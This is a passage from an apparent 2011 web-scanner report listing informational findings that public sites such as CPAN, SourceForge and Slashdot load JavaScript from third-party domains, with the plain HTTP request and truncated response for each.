  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /directory/advsearch.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=089d7ea1d8ba80fb168608272f1090c1; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.322. http://resources.joomla.org/directory/new.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /directory/new.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /directory/new.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=0b0ec261643fa10923bfbfaa489de5ba; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:10 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.323. http://resources.joomla.org/how-to-add-listings.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://resources.joomla.org
Path:   /how-to-add-listings.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /how-to-add-listings.html HTTP/1.1
Host: resources.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 041c772b92563f566daacce0f3f536ce=d7fb4f14f3981668855c2cc50303ff38; path=/
Last-Modified: Mon, 24 Jan 2011 16:02:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...

21.324. http://sabnzbd.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sabnzbd.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js

Request

GET / HTTP/1.1
Host: sabnzbd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.16 (Ubuntu)
Last-Modified: Mon, 24 Jan 2011 15:27:32 GMT
ETag: "6a00a-1d51-49a993d106100"
Accept-Ranges: bytes
Content-Length: 7505
Cache-Control: max-age=300, must-revalidate
Expires: Mon, 24 Jan 2011 16:07:14 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
<title>SABnzbd.org : Home of SABnzbd+, the Full-Auto Newsreader</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

...[SNIP]...
<!-- leave this for stats -->

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script>
...[SNIP]...

21.325. http://search.cpan.org/dist/Apache-NNTPGateway/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/Apache-NNTPGateway/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/Apache-NNTPGateway/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:17 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:17 GMT
Content-Length: 8105
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.326. http://search.cpan.org/dist/NNML/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/NNML/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/NNML/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:18 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:18 GMT
Content-Length: 9138
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.327. http://search.cpan.org/dist/NNTPClient/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/NNTPClient/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/NNTPClient/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:21 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:21 GMT
Content-Length: 7799
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.328. http://search.cpan.org/dist/News-Article-NoCeM/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/News-Article-NoCeM/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/News-Article-NoCeM/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:21 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:21 GMT
Content-Length: 7779
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.329. http://search.cpan.org/dist/POE-Component-Client-NNTP/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/POE-Component-Client-NNTP/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/POE-Component-Client-NNTP/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:22 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:22 GMT
Content-Length: 9598
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.330. http://search.cpan.org/dist/POE-Component-Server-NNTP/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/POE-Component-Server-NNTP/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/POE-Component-Server-NNTP/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:23 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:23 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:23 GMT
Content-Length: 9372
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.331. http://search.cpan.org/dist/newslib/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.cpan.org
Path:   /dist/newslib/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js
  • http://ipv4.v6test.develooper.com/js/v1/v6test.js

Request

GET /dist/newslib/ HTTP/1.1
Host: search.cpan.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:22 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: max-age=3600
Expires: Mon, 24 Jan 2011 17:02:22 GMT
Last-Modified: Mon, 24 Jan 2011 16:02:22 GMT
Content-Length: 11386
Content-Type: text/html; charset=iso-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="stylesheet" href="http://st.pimg.net/tucs/style.css" type="text/css" />
<link rel="stylesheet" href="http://
...[SNIP]...
</script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/cdn/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ipv4.v6test.develooper.com/js/v1/v6test.js"></script>
...[SNIP]...

21.332. http://shopping.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: shopping.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:01 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=f1ebd483b2efcc03279de61bb3488d25; expires=Tue, 01-Feb-2011 13:16:01 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0041639804840088
X-Served-In: 0.046626806259155
X-Served-By: h00
Content-Length: 42519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.333. http://simonwillison.net/2004/May/26/addLoadEvent/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://simonwillison.net
Path:   /2004/May/26/addLoadEvent/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://embed.technorati.com/linkcount
  • http://liquidfold.net/js/simonwillison
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google-analytics.com/urchin.js

Request

GET /2004/May/26/addLoadEvent/ HTTP/1.1
Host: simonwillison.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.5.4
Date: Tue, 25 Jan 2011 13:16:05 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Tue, 25 Jan 2011 13:16:12 GMT
Vary: Cookie
Last-Modified: Tue, 25 Jan 2011 13:14:12 GMT
ETag: 62572f46c0e2e4374a72e5ad7c169014
Cache-Control: max-age=120
Set-Cookie: openid="Set-Cookie: openid=; expires=Tue, 25-Jan-2011 13:16:05 GMT; Max-Age=0; Path=/;";
Content-Length: 63053

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Executing JavaSc
...[SNIP]...
<p><script src="http://embed.technorati.com/linkcount" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://liquidfold.net/js/simonwillison"></script>
...[SNIP]...

21.334. http://slashdot.org/bookmark.pl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://slashdot.org
Path:   /bookmark.pl

Issue detail

The response dynamically includes the following script from another domain:
  • http://a.fsdn.com/sd/all-minified.js?T_2_5_0_305

Request

GET /bookmark.pl?url={u}&title={t} HTTP/1.1
Host: slashdot.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.42 (Unix) mod_perl/1.31
X-Powered-By: Slash 2.005001305
X-Leela: You did the best you could, I guess, and some of these gorillas are okay.
X-XRDS-Location: http://slashdot.org/slashdot.xrds
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Content-Length: 23844
Date: Tue, 25 Jan 2011 13:16:10 GMT
X-Varnish: 2121089048
Age: 0
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<script id="before-content" type="text/javascript">
var pageload = {
   pagemark: '12
...[SNIP]...
<![endif]-->


<script src="//a.fsdn.com/sd/all-minified.js?T_2_5_0_305" type="text/javascript"></script>
...[SNIP]...

21.335. http://smallbusinessnews.tweetmeme.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smallbusinessnews.tweetmeme.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET / HTTP/1.1
Host: smallbusinessnews.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:16:10 GMT
Content-Type: text/html
Connection: close
Set-Cookie: tm_identity=bd74cadd632dd88dd5215d3c753b762c; expires=Tue, 01-Feb-2011 13:16:10 GMT; path=/; domain=.tweetmeme.com
X-Ads-Served-In: 0.0054209232330322
X-Served-In: 0.042685031890869
X-Served-By: ded2060
Content-Length: 44487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <!-- title -->
   <title
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.336. http://sorgalla.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorgalla.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://stats.wordpress.com/e-201103.js
  • http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET / HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:33 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 39294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

21.337. http://sorgalla.com/jcarousel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorgalla.com
Path:   /jcarousel/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://stats.wordpress.com/e-201103.js
  • http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit

Request

GET /jcarousel/ HTTP/1.1
Host: sorgalla.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:16:31 GMT
Server: Apache
Vary: Cookie
WP-Super-Cache: Served legacy cache file
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="de-DE">
<head profi
...[SNIP]...
</script><script type="text/javascript" src="http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

21.338. http://sourceforge.net/projects/nzbget/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/nzbget/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.fsdn.com/con/js/min.js?1295468581
  • http://a.fsdn.com/con/js/project.js?1295468581
  • http://a.fsdn.com/con/js/tagging.js?1295468581
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/nzbget/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca0eb1000c61; expires="Thu, 21-Jan-2021 16:02:32 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=8700121d2e69d73420eb7360565fa0b13958dd8dgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMGViMTAwMGM2MXEKVQNfaWRxC1UgNzljMTAxOWFiMWI4MWUzOGJmOGZmM2ZjMGJkNzllMWZxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009ophg07FUOX2NyZWF0aW9uX3RpbWVxDkdB009ophg0EXUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 40706
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Consume Server: sfs-consume-2 -->
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>


<script src="http://a.fsdn.com/con/js/min.js?1295468581" type="text/javascript"></script>


<script src="http://a.fsdn.com/con/js/project.js?1295468581" type="text/javascript"></script>
<script src="http://a.fsdn.com/con/js/tagging.js?1295468581" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...

21.339. http://sourceforge.net/projects/trn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/trn/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a.fsdn.com/con/js/min.js?1295468581
  • http://a.fsdn.com/con/js/project.js?1295468581
  • http://a.fsdn.com/con/js/tagging.js?1295468581
  • http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/trn/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: VISITOR=4d3da298dab0ca111a000af1; expires="Thu, 21-Jan-2021 16:02:35 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=9d302353afe3de71a0a2ec3d7914c1a46ba28173gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUFcHJlZnNxBX1xBlUOdXNlc19yZWxhdGlvbnNxB4lVB3ZlcnNpb25xCFUBMlUDa2V5cQlVGDRkM2RhMjk4ZGFiMGNhMTExYTAwMGFmMXEKVQNfaWRxC1UgMTkwODg5YjVhNTI4OWJkNDQ2OTE1ZGU4OGY3MDM4MmRxDFUOX2FjY2Vzc2VkX3RpbWVxDUdB009optJ41VUOX2NyZWF0aW9uX3RpbWVxDkdB009optJ4GHUu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 37454
Access-Control-Allow-Origin: *

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Consume Server: sfs-consume-2 -->
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
</script>


<script src="http://a.fsdn.com/con/js/min.js?1295468581" type="text/javascript"></script>


<script src="http://a.fsdn.com/con/js/project.js?1295468581" type="text/javascript"></script>
<script src="http://a.fsdn.com/con/js/tagging.js?1295468581" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=sfnet"></script>
...[SNIP]...

21.340. http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://starscene.dailystar.com.lb
Path:   /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
  • http://tcr.tynt.com/javascripts/Tracer.js?user=aM1itcjS8r36OVadbiUzgI&s=61&lang=en
  • http://www.apture.com/js/apture.js?siteToken=5rLcDWk

Request

GET /music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 HTTP/1.1
Host: starscene.dailystar.com.lb
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:02:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: PHPSESSID=fs7cao9ricm3m32upt64vdhf53; path=/
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 16:02:33 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 16:02:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</div>
<script type='text/javascript' id='aptureScript' src='http://www.apture.com/js/apture.js?siteToken=5rLcDWk' charset='utf-8'></script>
...[SNIP]...
<div id="footer">
<script src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php' type='text/javascript'></script>
...[SNIP]...
